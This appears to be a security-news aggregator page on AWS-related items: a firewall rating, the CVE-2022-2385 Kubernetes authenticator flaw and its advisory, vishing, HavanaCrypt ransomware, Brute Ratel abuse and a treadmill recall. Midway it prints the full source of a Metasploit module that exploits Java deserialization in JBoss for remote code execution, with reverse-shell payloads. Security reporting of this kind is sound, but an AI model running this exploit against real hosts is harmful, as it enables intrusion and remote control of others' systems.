Forcepoint's test results are second in a series of publications on this new technology.

AUSTIN, Texas, July 13, 2022 /PRNewswire/ -- CyberRatings.org, the non-profit entity dedicated to providing transparency on cybersecurity product efficacy, has completed an independent test of the Forcepoint Cloud Network Firewall (CNFW). Forcepoint received the highest possible overall rating of 'AAA' with excellent security and performance. The instance used for this test was c5.9xlarge (36 vCPU, 72 GB memory, and 10+ Gbps network Bandwidth).

Forcepoint's test report is the second in a series of CNFW publications from CyberRatings. Management & Reporting Capabilities, Routing and Policy Enforcement, SSL/TLS Functionality, Threat Prevention and Performance were all tested using Amazon Web Services (AWS) as the cloud provider. More products are being added to the test before the comparative report is published in the second half of 2022. The group test is the first-ever cloud network firewall evaluation provided to the market.

The CyberRatings exploit repository contains exploits that demonstrate a wide range of protocols and applications. Exploit sets for individual tests are selected based on CVSS score (how widely used is an application + what can an attacker do?), use case, and relevance to customers. Forcepoint's Threat Protection was rated excellent, blocking 35 out of 35 evasion techniques, 977 out of 977 exploits, with an excellent combined Rated Throughput of 943 Mbps.

While the firewall market is one of the largest and most mature security technology segments, this latest evolution virtualizes this functionality to provide scalable and elastic policy enforcement in a cloud environment.

"We were impressed with Forcepoint's security and performance," said Vikram Phatak, CEO of CyberRatings.org. "This product is a worthy contender and should be considered by enterprises," added Phatak.

A blog addressing the timeline for more CNFW to be published was issued today. To read the CyberRatings in-depth report on the various CNFW capabilities offered by Forcepoint, go to CyberRatings.org.

**Additional Resources**

*   Follow CyberRatings.org on Twitter
*   Follow CyberRatings.org on LinkedIn

**About CyberRatings.org**

CyberRatings.org is a non-profit 501(c)6 entity dedicated to quantifying cyber risk and providing transparency on cybersecurity product efficacy through testing and ratings programs. To become a member, visit www.cyberratings.org

CyberRatings.org Issues AAA Rating on Forcepoint's Cloud Network Firewall

Flaw in Amazon’s Kubernetes service has since been fixed

Jessica Haworth 13 July 2022 at 14:29 UTC

Flaw in Amazon’s Kubernetes service has since been fixed

A vulnerability in AWS IAM Authenticator for Kubernetes could allow a malicious actor to impersonate other users and escalate privileges in Kubernetes clusters, a security researcher has discovered.

Tracked as CVE-2022-2385, the now-patched vulnerability could allow an attacker to impersonate other users and escalate privileges in Elastic Kubernetes Service (EKS) clusters configured with template parameter.

An attacker could craft a malicious signed request to Security Token Service (STS) endpoint that includes the same parameter multiple times with different values.

**Authentication bypass**

Researcher Gafnit Amiga of Lightspin detailed in a blog post how an attacker can send two different variables with the same name but with different uppercase and lowercase characters – for example, they are able to send both ‘Action’ and ‘action’.

Amiga explained: “Since both \[variables in the vulnerable code\] are… ‘’, the value in the dictionary will be overridden while the request to AWS will be sent with both parameters and their values.

“The cool thing is that AWS STS will ignore the parameter it does not expect, in this case AWS STS will ignore the action parameter.

Read more of the latest news about security vulnerabilities

Amiga wrote: “Because the for loop is not ordered, the parameters are not always overridden in the order we want, therefore we might need to send the request with the malicious token to the AWS IAM Authenticator server multiple times.

The vulnerable root cause was present since the first commit in October 2017. As such, both the changing action and unsigned cluster ID tokens were exploitable since day one.

The exploitation of the username through the was possible since September 2020.

**Fixes issued**

Amiga told The Daily Swig that the vulnerability was difficult to locate, and that it was also tricky to notice that values can be overridden while STS ignores unexpected additional request parameters.

“I tried other attack vectors hoping to manipulate the HTTP client, but they protected against them,” Amiga said.

Amazon has since patched the issues which Amiga said has “improved the process significantly”. The researcher added: “The entire process was one month, and they kept me updated during the process. We also coordinated the disclosure.”

The updates are fixed in version 0.5.9. More information can be found in Amazon’s security bulletin.

YOU MAY ALSO LIKE ‘Dirty dancing’ in OAuth: Researcher discloses how cyber-attacks can lead to account hijacking

Vulnerability in AWS IAM Authenticator for Kubernetes could allow user impersonation, privilege escalation attacks

Businesses receive an invoice via email with a credit card charge and are asked to call a fake number and hand over personal information to receive a refund.

Cybercriminals are posing as Intuit's popular accounting software package QuickBooks to target Google Workspace and Microsoft 365 small business users in a voice-phishing scam.

The campaign sends a false invoice via email containing a claim that a credit card has already been charged for an order. In order to dispute the charge, victims are directed to call the number included in the email, according to researchers with INKY. The scam was first uncovered in December 2021 and the frequency of attack has accelerated sharply, they said.

The threat actors have been leveraging QuickBooks' free 30-day trial offer to set up fake accounts from which to send fraudulent invoices, impersonating major IT companies including Amazon, Apple, PayPal, and McAfee. Once the victim calls, they are asked for bank account information, login credentials, or other personally identifiable information.

"These attacks were highly effective at evading detection because they were identical to non-fraudulent Quickbooks notifications, even when examining the emails' raw HTML files closely," the report noted. "All notifications originated from authentic Intuit IP addresses, passed email authentication (SPF and DKIM) tests for intuit\[.\]com, and only contained high-reputation intuit\[.\]com URLs."

One such scam in April impersonated an Amazon Prime shipping notification, which used the strings "amazn" and "amzn" to evade detection filters. By clicking on the "print or save" or "view invoice" buttons, the victim is then taken to Intuit's website and shown a fraudulent invoice, inducing the user to call the number and give up financial information.

"The natural response is to get right on the phone and try to back the order out, or, barring that, find a way to obtain a refund," the INKY report noted. "The phishers take advantage of this disrupted emotional state to extract personal or financial information before the victim realizes that something is off."

**Defense Requires Vigilance**

INKY recommends that recipients of these kinds of messages should refrain from calling any phone numbers they provide and be wary of requests for payment through the form of gift cards, a method unlikely to be used by businesses.

"If there is any doubt about a charge, it is best to contact the relevant credit card company to see if there really is a charge in that amount," the report noted. "Any real charge would be shown as 'pending'."

Small businesses are increasingly targets for cyberattacks, according to recent research; however, just 40% of small businesses have a cybersecurity policy. Among the key steps small businesses can take to improve their security posture is adopting strong security policies and training employees in best practices, along with tactical investments in cybersecurity software.

**Plenty of Phishing in the Sea**

Meanwhile, cybercriminals are deploying new vishing methods to defraud victims, according to a report from Kaspersky, including attacks carried out through popular social media sites or major IT service providers like PayPal. A recent vishing scam cited by Kaspersky was based on a widespread TikTok prank where friends use an automated answering-machine voice to warn them that a lot of money will soon be taken out of their bank account.

"When people are convinced to disclose their personal data during a phone call rather than on a phishing page, they often don't have the chance to consider that they are the target of a hoax — and the large number of TikTok videos with this prank is a prominent example of this," according to Kaspersky.

The security firm reports that the volume of vishing is on the rise, with 350,000 vishing emails between March and June 2022, with nearly 100,000 of these emails spotted in June alone.

QuickBooks Vishing Scam Targets Small Businesses

An unauthenticated attacker with network access to the JBOSS EAP/AS versions 6.x and below Remoting Unified Invoker interface can send a serialized object to the interface to execute code on vulnerable hosts.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  include Msf::Exploit::JavaDeserialization  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'JBOSS EAP/AS Remoting Unified Invoker RCE',        'Description' => %q{          An unauthenticated attacker with network access to the JBOSS          EAP/AS <= 6.x Remoting Unified Invoker interface can send a          serialized object to the interface to execute code on vulnerable hosts.        },        'Author' => [          'Joao Matos <@joaomatosf>',         # Discovery          'Marcio Almeida <@marcioalm>',      # PoC          'Heyder Andrade <@HeyderAndrade>'   # msf module        ],        'References' => [          [ 'URL', 'https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf']        ],        'DisclosureDate' => '2019-12-11',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'printf' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      Opt::RPORT(4446)    ])  end  def handshake_data    # MAGIC BYTES JAVA SERIALIZATION OBJECT HEADER    # AC ED: STREAM_MAGIC. Specifies that this is a serialization protocol.    # 00 05: STREAM_VERSION. The serialization version.    ['aced0005'].pack('H*')  end  def check    connect    sock.put(handshake_data)    data = sock.get_once(16)    disconnect    return Exploit::CheckCode::Appears if data == handshake_data    return Exploit::CheckCode::Safe  rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e    print_error("Error to connect #{rhost}:#{rport} : '#{e.class}' '#{e}'")    return Exploit::CheckCode::Unknown  end  # def exploit  def execute_command(cmd, _opts = {})    java_payload = generate_java_deserialization_for_command('CommonsCollections5', 'bash', cmd)    # MAGIC BYTES JBOSS PROTOCOL:    # 0x77: TC_BLOCKDATA    # 0x01: Length of TC_BLOCKDATA    # 0x16: Protocol version 22    # 0x79: TC_RESET    magic_bytes = ['77011679'].pack('H*')    payload = magic_bytes + java_payload.byteslice(4..)    connect    sock.put(handshake_data)    sock.get_once(16)    sock.put(payload)    disconnect    print_good('Successfully sent payload')  rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e    fail_with(Failure::Unreachable, e.message)  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

JBOSS EAP/AS 6.x Remote Code Execution

A security issue was discovered in aws-iam-authenticator where an allow-listed IAM identity may be able to modify their username and escalate privileges.

**Hausler, Micah**

unread,

Jul 11, 2022, 6:40:08 PM (yesterday) Jul 11

to kubernete...@googlegroups.com, d...@kubernetes.io, kubernetes-sec...@googlegroups.com, kubernetes-se...@googlegroups.com, distributo...@kubernetes.io, kubernetes+a...@discoursemail.com

Hello Kubernetes Community,

A security issue was discovered in aws-iam-authenticator where an allow-listed IAM identity may be able to modify their username and escalate privileges. 

This issue has been rated **high** (https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N), and assigned CVE-2022-2385

**Am I vulnerable?**

Users are only affected if they use the AccessKeyID template parameter to construct a username and provide different levels of access based on the username.

**Affected Versions**

*   v0.5.2 - v0.5.8

**How do I mitigate this vulnerability?**

Upgrading to v0.5.9 mitigates this vulnerability.

Prior to upgrading, this vulnerability can be mitigated by not using the {{AccessKeyID}} template value to construct usernames.

**Fixed Versions**

*   aws-iam-authenticator v0.5.9

**Detection**

This issue affected the logged identity, and is not discernible from valid requests.

**Additional Details**

See the GitHub issue for more details: https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472

**Acknowledgements**

This vulnerability was reported by Gafnit Amiga from Lightspin

Micah Hausler

Principal Engineer

Amazon Web Services

CVE-2022-2385: [Security Advisory] CVE-2022-2385: AccessKeyID validation bypass

Nautilus treadmills T616 S/N 100672PRO21140001 through 100672PRO21171980 and T618 S/N 100647PRO21130111 through 100647PRO21183960 with software before 2022-06-09 allow physically proximate attackers to cause a denial of service (fall) by connecting the power cord to a 120V circuit (which may lead to self-starting at an inopportune time).

*   Recalled Nautilus T618 Treadmill
    
*   Recalled Nautilus T616 Treadmill
    

Name of Product:

Nautilus Treadmills

Hazard:

The treadmills can start on their own, posing a fall hazard to a user.

Recall Date:

June 09, 2022

**Recall Details**

Description:

This recall involves Nautilus treadmills with model number T616 and serial numbers 100672PRO21140001 through 100672PRO21171980 and with model number T618 and serial numbers 100647PRO21130111 through 100647PRO21183960.  Nautilus and the model number are printed on the plastic shroud at the front of the treadmill’s walking belt. The serial number is on the base-frame of the treadmill beneath the belt.

Remedy:

Consumers should immediately stop using the recalled treadmills and contact Nautilus to receive a free USB flash drive with a software upgrade and installation instructions. Nautilus will automatically ship the USB flash drive and instructions at no cost to customers who purchased the treadmills directly from Nautilus. The instructions will direct consumers to plug the flash drive into the USB port on the treadmill to upload the software upgrade. 

Incidents/Injuries:

Nautilus has received 21 reports of the treadmills self-starting. No injuries have been reported.

Sold At:

Best Buy, Walmart and other stores nationwide and online at www.Nautilus.com and www.Amazon.com from April 2021 through November 2021 for about $1,150 for Model T616 and about $1,500 for Model T618.

Manufacturer(s):

Zhejiang Arcana Power Health Tech. CO. LTD., of China

Importer(s):

Nautilus Inc., of Vancouver, Wash.

This recall was conducted, voluntarily by the company, under CPSC’s Fast Track Recall process. Fast Track recalls are initiated by firms, who commit to work with CPSC to quickly announce the recall and remedy to protect consumers.

About the U.S. CPSC

The U.S. Consumer Product Safety Commission (CPSC) is charged with protecting the public from unreasonable risk of injury or death associated with the use of thousands of types of consumer products. Deaths, injuries, and property damage from consumer product-related incidents cost the nation more than $1 trillion annually. CPSC's work to ensure the safety of consumer products has contributed to a decline in the rate of injuries associated with consumer products over the past 50 years.

Federal law prohibits any person from selling products subject to a Commission ordered recall or a voluntary recall undertaken in consultation with the CPSC.

For lifesaving information:

*   Visit CPSC.gov.
*   Sign up to receive our e-mail alerts.
*   Follow us on Facebook, Instagram @USCPSC and Twitter @USCPSC.
*   Report a dangerous product or a product-related injury on www.SaferProducts.gov.
*   Call CPSC’s Hotline at 800-638-2772 (TTY 301-595-7054).
*   Contact a media specialist.

CVE-2022-35648: Nautilus Recalls Treadmills Due to Fall Hazard

The new open source security-as-code platform will help developers and security teams automatically detect security policy violations across the organization's cloud infrastructure.

As more organizations migrate their data, applications, and workloads to the cloud, securing the infrastructure remains a challenge. Security teams don't always know exactly what is happening within each cloud environment, making it difficult to detect when security policies are being violated.

That's the problem Paladin Cloud aims to solve with its security-as-code platform.

Paladin Cloud’s platform is intended to help developers and DevOps teams safeguard their applications and data, both in testing and production. It accomplishes this goal by providing teams with full visibility into the organization's various cloud services and systems. The platform includes a plug-in-based architecture that helps developers connect to and ingest data from sources including code repositories, threat intelligence systems, container scanning, API gateways, and cloud-based enterprise systems such as Kubernetes.

Supported vendor systems include Qualys Vulnerability Assessment Platform, Bitbucket, Trend Micro Deep Security, Tripwire, Venafi Certificate Management, and Red Hat. Security teams can write rules based on data collected by these plugins to get a complete picture of the organization's cloud security posture.

"The platform discovers assets, evaluates policy, creates issues for policy violations, and prioritizes remediation," according to a page on Paladin Cloud's GitHub repository. If fixes for policy violations have already been defined, then the platform can go ahead and execute those actions to remediate the issues. This way, the platform provides automatic detection and remediation of violations, such as unauthorized access, misconfigured systems, and insecure APIs.

Organizations can also take advantage of the platform's extensible policy management to oversee hybrid clouds, where the data and applications are hosted on both public and private infrastructure.

Paladin Cloud lists various out-of-the-box features on its GitHub page, including continuous asset discovery, ability to search all discovered resources, custom policies and custom auto-fix actions, dynamic asset grouping to view compliance, exception management, OAuth2 support, and role-based access control.

The platform is now generally available for Amazon Web Services, Google Cloud, and Microsoft Azure. Along with announcing the platform's availability, the company announced a $3.3 million seed financing round.

Paladin Cloud Launches New Cloud Security and Governance Platform

"HavanaCrypt" is also using a command-and-control server that is hosted on a Microsoft Hosting Service IP address, researchers say.

Threat actors are increasingly using fake Microsoft and Google software updates to try to sneak malware on target systems.

The latest example is "HavanaCrypt," a new ransomware tool that researchers from Trend Micro recently discovered in the wild disguised as a Google Software Update application. The malware's command and-control (C2) server is hosted on a Microsoft Web hosting IP address, which is somewhat uncommon for ransomware, according to Trend Micro.

Also notable, according to the researchers, is HavanaCrypt's many techniques for checking if it is running in a virtual environment; the malware's use of code from open source key manager KeePass Password Safe during encryption; and its use of a .Net function called "QueueUserWorkItem" to speed up encryption. Trend Micro notes that the malware is likely a work-in-progress because it does not drop a ransom note on infected systems.

HavanaCrypt is among a growing number of ransomware tools and other malware that in recent months have been distributed in the form of fake updates for Windows 10, Microsoft Exchange, and Google Chrome. In May, security researchers spotted ransomware dubbed "Magniber" doing the rounds disguised as Windows 10 updates. Earlier this year, researchers at Malwarebytes observed the operators of the Magnitude Exploit Kit trying to fool users into downloading it by dressing the malware as a Microsoft Edge update.

As Malwarebytes noted at the time, fake Flash updates used to be a fixture of Web-based malware campaigns until Adobe finally retired the technology because of security concerns. Since then, attackers have been using fake versions of other frequently updated software products to try to trick users into downloading their malware — with browsers being one of the most frequently abused.

Creating fake software updates is trivial for attackers, so they tend to use them to distribute all classes of malware including ransomware, info stealers, and Trojans, says an analyst with Intel 471 who requested anonymity. "A non-technical user might be fooled by such techniques, but SOC analysts or incident responders will likely not be fooled," the analyst says.

Security experts have long noted the need for organizations to have multi-layered defenses in place to defend against ransomware and other threats. This includes having controls for endpoint detection and response, user and entity behavior-monitoring capabilities, network segmentation to minimize damage and limit lateral movement, encryption, and strong identity and access control -- including multi-factor authentication. 

Since adversaries often target end users, it is also critical for organizations to have strong practices in place for educating users about phishing risks and social engineering scams designed to get them to download malware or follow links to credential harvesting sites.

**How HavanaCrypt Works**

HavanaCrypt is .Net malware that uses an open-source tool called Obfuscar to obfuscate its code. Once deployed on a system, HavanaCrypt first checks to see if the "GoogleUpdate" registry is present on the system and only continues with its routine if the malware determines the registry is not present.

The malware then goes through a four-stage process to determine if the infected machine is in a virtualized environment. First it checks the system for services such as VMWare Tools and vmmouse that virtual machines typically use. Then it looks for files related to virtual applications, followed by a check for specific file names used in virtual environments. Finally, it compares the infected systems' MAC address with unique identifier prefixes typically used in virtual machine settings. If any of checks show the infected machine to be in a virtual environment, the malware terminates itself, Trend Micro said.

Once HavanaCrypt determines it's not running in a virtual environment, the malware fetches and executes a batch file from a C2 server hosted on a legitimate Microsoft Web hosting service. The batch file contains commands for configuring Windows Defender in such a manner that it allows detected threats. The malware also stops a long list of processes, many of which are related to database applications such as SQL and MySQL or to desktop applications such as Microsoft Office.

HavanaCrypt's next steps include deleting shadow copies on the infected systems, deleting functions for restoring data, and gathering system information such as the number of processors the system has, processor type, product number, and BIOS version. The malware uses the QueueUserWorkItem function and code from KeePass Password Safe as part of the encryption process.

"QueueUserWorkItem is a standard technique for creating thread pools," says the analyst from Intel 471. "The use of thread pools will speed up encryption of the files on the victim machine."

With KeePass, the ransomware author has copied code from the password manager tool and used this code in their ransomware project. "The copied code is used to generate pseudorandom encryption keys," the analyst notes. "If the encryption keys were generated in a predictable, repeatable way, then it might be possible for malware researchers to develop decryption tools."

The attacker's use of a Microsoft hosting service for the C2 server highlights the broader trend by attackers to hide malicious infrastructure in legitimate services to evade detection. "There is a great deal of badness hosted in cloud environments today, whether it's Amazon, Google, or Microsoft and many others," says John Bambenek, principal threat hunter at Netenrich. "The highly transient nature of the environments makes reputation systems useless."

Fake Google Software Updates Spread New Ransomware

The latest criminal use of a legitimate red-teaming tool helps attackers stay under the radar and better access living-off-the-land binaries.

In a fresh campaign that takes a page from the advanced persistent threat known as APT29, hackers are shifting away from the Cobalt Strike post-exploitation toolkit, instead embracing Brute Ratel C4 (BRc4).

BRc4 is the latest upstart in the red-team tooling world; like Cobalt Strike, it's an adversarial attack simulation tool designed for penetration testers. It’s a command-and-control (C2) framework that's not easily detected by endpoint detection and response (EDR) technology or other anti-malware tools.

A report from Palo Alto Networks' Unit 42 research team found evidence of attackers subverting Brute Ratel's free licensing protections and utilizing the tool to run criminal attack campaigns.

The infrastructure they uncovered is extensive, researchers noted.

"In terms of C2, we found that the sample called home to an Amazon Web Services (AWS) IP address located in the United States over port 443," they explained. "Further, the X.509 certificate on the listening port was configured to impersonate Microsoft with an organization name of 'Microsoft' and organization unit of 'Security.'"

Pivoting on the certificate and other artifacts, "we identified a total of 41 malicious IP addresses, nine BRc4 samples, and an additional three organizations across North and South America who have been impacted by this tool so far," they added.

**Living-Off-the-Land Techniques**

Unit 42 said the sample utilizing BRc4 uses known APT29 techniques, including well-known cloud storage and online collaboration applications. In this case, the sample studied was packaged up as a self-contained ISO that included a Windows shortcut LNK file, a malicious payload library, and a legitimate copy of Microsoft OneDrive Updater.

"Attempts to execute the benign application from the ISO-mounted folder resulted in the loading of the malicious payload as a dependency through a technique known as DLL search order hijacking," the report explained.

This technique of using legitimate tools and native utilities is known as "living off the land," and threat actors are increasingly using living-off-the-land binaries (LOLBins) to drop malicious payloads.

Last week for instance, researchers with Cyble reported an uptick in LNK file-based builders growing in popularity on Dark Web marketplaces, as various malware families lean on them for payload delivery.

"We have observed a steadily increasing number of high-profile threat actors shifting back to .LNK files to deliver their payloads," the Cyble researchers wrote. "Typically, threat actors use LOLBins in such infection mechanisms because it makes detecting malicious activity significantly harder."

**Where Red Team Tools Fit In**

Tools like Cobalt Strike and BRc4 aren't purely living-off-the-land approaches, "since you still have to introduce a piece of malware onto the system as opposed to using the operating systems built in tooling," explains Tim McGuffin, director of adversarial engineering at LARES Consulting.

However, these tools are nevertheless popular with attackers for their ability to evade detection mechanisms, fundamentally for the same reason as a living-off-the-land attack works — because they're otherwise viewed as legitimate software.

"Brute Ratel is an otherwise legitimate tool that might be present in victim networks," explains John Bambenek, principal threat hunter at Netenrich. "Since its use is likely whitelisted, it allows for attackers to operate more discretely than they would otherwise be able to do."

This is an unfortunate cycle that the security world has seen occur for a long time, as attackers are drawn to red-team tools like flies to honey.

According to Ivan Righi, senior cyber threat intelligence analyst for Digital Shadows, it's no surprise that BRc4 makes for an attractive tool. Not only does it have offensive security capabilities similar to Cobalt Strike that can be abused for malicious purpose, but it is also less known than Cobalt Strike.

"Many security solutions may not yet detect Brute Ratel as malicious, as opposed to Cobalt Strike, which is generally more well-known for being used for malicious purposes," Righi says.

According to McGuffin, security practitioners should be concerned about all toolkits like these, whether open source, commercial, or custom. But he believes that they shouldn't get caught up in the whack-a-mole game of detecting the framework or the tooling itself. Instead, they should focus on hardening their systems.

"An emphasis on endpoint hardening can be placed on prevention against any C2 tooling. An example is Microsoft's Attack Surface Reduction 'Application Allow-listing' guidance," he says. "The setting prevents unknown binaries from being introduced, and network egress hardening to prevent C2 callbacks to Command-and-Control servers."

Stealthy Cyber-Campaign Ditches Cobalt Strike for Rival 'Brute Ratel' Pen Test Tool

OpenVPN Access Server 2.10 and prior versions are susceptible to resending multiple packets in a response to a reset packet sent from the client which the client again does not respond to, resulting in a limited amplification attack.

Tag

#amazon